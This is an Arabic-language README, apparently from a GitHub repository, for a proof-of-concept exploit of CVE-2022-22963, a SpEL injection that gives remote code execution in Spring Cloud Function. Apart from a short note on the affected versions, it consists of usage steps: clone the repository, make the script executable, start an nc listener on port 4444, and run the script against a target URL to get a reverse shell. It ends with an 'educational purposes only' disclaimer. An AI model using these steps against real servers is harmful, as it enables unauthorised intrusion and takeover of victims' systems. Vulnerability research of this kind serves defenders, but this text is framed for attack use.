
استغلال لإثبات المفهوم لـ CVE-2022-22963، وهو حقن SpEL في Spring Cloud Function يؤدي إلى تنفيذ تعليمات برمجية عن بُعد. يتضمن سكريبت شل للاستغلال الآلي مع حمولة شل عكسي.
في الإصدارات 3.1.6 و 3.2.2 والإصدارات السابقة من Spring Cloud Function، عند استخدام وظيفة التوجيه، من الممكن أن يقدم المستخدم تعبير SpEL مصمم خصيصًا كتعبير توجيه قد يؤدي إلى تنفيذ بعيد للكود والوصول إلى الموارد المحلية.
استنساخ المستودع
git clone https://github.com/jrbH4CK/CVE-2022-22963.git
ادخل إلى المجلد
cd CVE-2022-22963
تغيير أذونات التنفيذ
chmode +x springCloud.sh
ابدأ nc على المنفذ المطلوب
nc -nlvp 4444
قم بتنفيذ الأمر التالي مع تغيير المعاملات حسب احتياجاتك
./springCloud.sh url lhost lport
ملاحظة: استخدام هذا المستودع هو مسؤولية المستخدم وليس المؤلف، للأغراض التعليمية فقط.